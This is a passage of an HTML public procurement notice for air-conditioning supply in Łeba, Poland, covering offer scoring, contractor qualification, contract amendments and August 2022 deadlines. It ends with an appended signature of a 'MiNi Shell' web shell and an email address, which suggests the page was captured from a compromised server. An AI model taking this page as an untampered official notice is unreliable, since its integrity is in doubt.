przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 214 ust. 1 pkt 8 ustawy<br/>Prawo zamówień publicznych, polegających na dostawie urządzeń klimatyzacyjnych . Przedmiot<br/>zamówienia: zwiększenie bieżących dostaw lub rozbudowa istniejących instalacji zgodne z<br/>przedmiotem zamówienia podstawowego o kodach CPV określonych w tym zamówieniu. Wielkość<br/>lub zakres zamówienia: do 20% wartości zamówienia podstawowego. Warunki na jakich zostanie<br/>udzielone zamówienie: zgodnie z warunkami dotyczącymi zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej zamawiający będzie kierował się następującymi<br/>kryteriami, z przypisaniem im odpowiednio wag:<br/>1) cena oferty – 60%<br/>2) okres gwarancji – 40%<br/>2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) Punkty w kryterium cena brutto oferty w PLN wyliczone będą z dokładnością do<br/>dwóch miejsc po przecinku (zasada zaokrąglania trzeciego miejsca po przecinku –<br/>poniżej 5 końcówkę pomija się, powyżej i równe 5 zaokrągla się w górę) wg<br/>poniższego wzoru:<br/>Cmin<br/>C= ------------------ x 60 pkt.<br/>Cx<br/>gdzie:<br/>C – przyznane punkty w kryterium ceny oferty brutto w PLN;<br/>Cmin - najniższa cena oferty brutto w PLN spośród ofert niepodlegających odrzuceniu;<br/>Cx – cena brutto w PLN badanej oferty.<br/>2) Punkty w kryterium okres gwarancji, zostaną przyznane wg następujących zasad:<br/>Okres gwarancji – maksymalnie 40 pkt. (nie mniej niż 36 miesięcy, nie więcej niż 84<br/>miesiące)<br/>Przyjmuje się, że oferta z najdłuższym okresie gwarancji otrzyma 40 pkt.<br/>W przypadku gdy Wykonawca poda dłuższy okres gwarancji do obliczeń Zamawiający przyjmie wartość<br/>84 miesiące. W przypadku, gdy Wykonawca złoży ofertę, w której wskaże okres gwarancji poniżej 36<br/>miesięcy oferta będzie potraktowana jako niezgodna z treścią SWZ i zostanie odrzucona, w przypadku<br/>gdy Wykonawca nie wpisze nic w tym kryterium oceny, Zamawiający przyjmie do obliczeń wartość<br/>minimalną gwarancji, tj. 36 miesięcy.<br/>X =<br/>ilość pełnych miesięcy okresu<br/>gwarancji ocenianej oferty - 36 x 40 pkt.<br/>84 - 36<br/>3. Zamawiający za najkorzystniejszą uzna ofertę, która uzyska największą liczbę punktów łącznie<br/>ze wszystkich kryteriów. Ocenę łączną oferty stanowi suma punktów uzyskanych w ramach<br/>poszczególnych kryteriów. Zamawiający wyliczy ocenę łączą ocenianych ofert na podstawie<br/>poniższego wzoru:<br/>E = C + X<br/>gdzie:<br/>E – łączna liczba punktów otrzymana przez ofertę we wszystkich kryteriach oceny,<br/>C – liczba punktów w kryterium ceny oferty brutto w PLN,<br/>X – liczba punktów w kryterium okres gwarancji.<br/>4. Zamawiający będzie zaokrąglał punkty do dwóch miejsc po przecinku w każdym wskaźniku.<br/>Zasada zaokrąglenia dotyczy trzeciego miejsca po przecinku – poniżej 5 końcówkę pominie,<br/>powyżej i równe 5 zaokrągli w górę.<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert<br/>wybierze ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający<br/>wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym ofert<br/>dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu;<br/>2) spełniają warunki udziału w postępowaniu określone przez Zamawiającego w ogłoszeniu<br/>o zamówieniu i niniejszej SWZ.<br/>2. Zamawiający wymaga wykazania przez Wykonawcę spełnienia warunków określonych<br/>w art. 112 ust. 2 ustawy pzp dotyczących zdolności technicznej i zawodowej:<br/>1) Zamawiający uzna warunek za spełniony jeżeli wykonawca przedstawi wykaz zamówień<br/>zrealizowanych nie wcześniej niż w okresie ostatnich 3 lat od dnia w którym upływa termin<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie minimum<br/>dwóch zamówień o wartości min. 100.000,00 zł brutto (słownie: sto tysięcy złotych) każda,<br/>polegających na dostawie, montażu i uruchomieniu systemu klimatyzacji;<br/>3. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach polegać na zdolnościach technicznych lub zawodowych lub sytuacji<br/>finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru<br/>prawnego łączących go z nimi stosunków prawnych.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby,<br/>jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane.<br/>5. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa wraz z ofertą, zobowiązanie podmiotu (wzór - załącznik nr 4 SWZ) udostępniającego<br/>zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego<br/>zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca, realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie podmiotu<br/>udostępniającego zasoby ma potwierdzać, że stosunek łączący Wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w<br/>szczególności:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia<br/>następujących podmiotowych środków dowodowych potwierdzających spełnianie warunków<br/>udziału w postępowaniu:<br/>1) wykaz zamówień zrealizowanych nie wcześniej niż w okresie ostatnich 3 lat od dnia w którym<br/>upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie<br/>minimum dwóch zamówień o wartości min. 100.000,00 zł brutto (słownie: sto tysięcy złotych)<br/>każda, polegających na dostawie, montażu i uruchomieniu systemu klimatyzacji - z załączeniem<br/>dowodów określających czy zostały one wykonane należycie, w szczególności informacji o tym<br/>czy dostawa i montaż został wykonany zgodnie z przepisami prawa budowlanego i prawidłowo<br/>ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>wystawione przez podmiot, na rzecz którego dostawa i montaż były wykonywane, a jeżeli z<br/>uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych<br/>dokumentów - inne dokumenty (wzór wykazu - załącznik nr 5 do SWZ);<br/>2. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia należy przekazać<br/>Zamawiającemu przy użyciu środków komunikacji elektronicznej dopuszczonych w SWZ, w<br/>zakresie i sposób określony w przepisach rozporządzenia Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).<br/>Podmiotowe środki dowodowe sporządzone w języku obcym muszą być złożone wraz z<br/>tłumaczeniem na język polski.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty należy dołączyć<br/>oświadczenie o niepodleganiu wykluczeniu w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym, a następnie wraz z plikami stanowiącymi ofertę skompresować do jednego pliku archiwum (ZIP)</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedstawienia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do przygotowania oferty zaleca się wykorzystanie Formularza Oferty, którego wzór stanowi Załącznik nr 1 do SWZ. W<br/>przypadku, gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru, w treści oferty należy zamieścić<br/>wszystkie informacje wymagane w Formularzu Ofertowym.<br/>Do oferty należy dołączyć pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia do oferty należy załączyć<br/>pełnomocnictwo dla pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. Wykonawca dołącza do oferty oświadczenie, o którym mowa w art. 125 ust. 1 Ustawy, którego wzór stanowią załączniki<br/>nr 2 i 3 do SWZ. Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w<br/>postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki<br/>dowodowe. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym mowa<br/>powyżej - załączniki nr 2 i 3 do SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu.<br/>3.Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane lub<br/>usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana umowy w zakresie ceny, może nastąpić w razie zaistnienia okoliczności:<br/>• ustawowej zmiany stawki podatku od towarów i usług VAT,<br/>2. Zmiana umowy w zakresie zmiany terminu realizacji, może nastąpić w razie zaistnienia<br/>następujących zdarzeń:<br/>1) wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym<br/>wpływ na realizację przedmiotu Umowy.<br/>2) wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w Umowie, których<br/>nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności<br/>i doprecyzowanie Umowy w celu jednoznacznej interpretacji jej zapisów przez Strony,<br/>3) wydanie decyzji administracyjnej przez organ nadzoru budowlanego lub ochrony<br/>środowiska o wstrzymaniu prac montażowych w wyniku interwencji obywatela lub<br/>organizacji społecznej;<br/>4) wstrzymanie prac montażowych przez Zamawiającego lub przez uprawnione organy<br/>z przyczyn niewynikających z winy stron Umowy;<br/>5) wystąpienie nieprzewidzianych zjawisk atmosferycznych, (np.: wichury, ulewy, śnieżyce,<br/>gradobicie, mrozy) <br/>6) wystąpienia siły wyższej, rozumianej jako zdarzenie niemożliwe do przewidzenia, na które<br/>Strony nie mają wpływu i są przez Strony niemożliwe do pokonania, a w szczególności:<br/>klęski żywiołowe, wojny, zamknięcie granic uniemożliwiające wykonanie umowy w całości<br/>lub w części, pod warunkiem dostarczenia w terminie 5 dni od dnia zniesienia zaistniałej<br/>siły wyższej, przez Stronę dotkniętą wystąpienie siły wyższej, dokumentu<br/>potwierdzającego zaistnienie siły wyższej wystawianego przez właściwy organ<br/>administracji publicznej oraz wskazania wpływu zdarzenia na wykonanie umowy, i jeśli<br/>wystąpienie siły wyższej wpłynął bezpośrednio na prawidłowe wykonywanie robót i<br/>termin ich wykonania to termin wykonania umowy zostanie przedłużony o czas jej<br/>trwania;<br/>7) w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia<br/>losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć<br/>z pewnością, szczególnie zagrażające bezpośrednio życiu lub zdrowiu ludzi lub grożące<br/>powstaniem szkody niewspółmiernie większej niż spowodowana działaniem lub<br/>zaniechaniem;<br/>8) konieczność usunięcia błędów lub wad w opracowaniu projektowym albo konieczność<br/>wprowadzenia zmian w opracowaniu projektowym, które mają wpływ na termin<br/>wykonania przedmiotu umowy;<br/>9) konieczność wykonania prac zamiennych lub innych czynności niezbędnych do wykonania<br/>przedmiotu Umowy, które wstrzymują lub opóźniają realizację przedmiotu Umowy;<br/>10) wystąpienia na terenie kraju pandemii lub epidemii powodującej konieczność<br/>wstrzymania kluczowych robót z uwagi na brak materiałów lub nieobecność pracowników;<br/>11) przedłużenia procedury udzielenia przedmiotowego zamówienia publicznego przez środki<br/>ochrony prawnej wykorzystywane przez wykonawców lub inne podmioty, lub<br/>Zamawiającego przez zawarciem umowy;<br/>12) w związku z okolicznościami nie mającymi związku z prowadzonymi pracami, a<br/>wynikającymi z prowadzonej przez Zamawiającego działalności<br/>13) Zmiany terminów realizacji przedmiotu Umowy z przyczyn niezależnych od Wykonawcy,<br/>w szczególności:<br/>a) jeżeli będą następstwem:<br/>• zmiany przepisów prawnych istotnych dla realizacji przedmiotu Umowy,<br/>• polecenia przez Zamawiającego dokonania zmian w uzgodnionych wcześniej<br/>rozwiązaniach,<br/>14) Wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi<br/>okolicznościami:<br/>a) siła wyższa uniemożliwiająca wykonanie przedmiotu Umowy zgodnie ze szczegółowym<br/>opisem (siła wyższa to zdarzenie: (a) zewnętrzne, (b) niemożliwe (lub prawie<br/>niemożliwe) do przewidzenia, (c) którego skutkom nie można zapobiec),<br/>b) zmiana danych związanych ze zmianami administracyjno-organizacyjno-prawnymi<br/>Umowy,<br/>15) W przypadku wystąpienia któregokolwiek ze zdarzeń wymienionych w pkt 1 do 7 powyżej<br/>termin realizacji przedmiotu Umowy może ulec odpowiedniemu przedłużeniu, o czas<br/>niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej<br/>jednak niż o okres trwania tych okoliczności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/leba</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-11 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com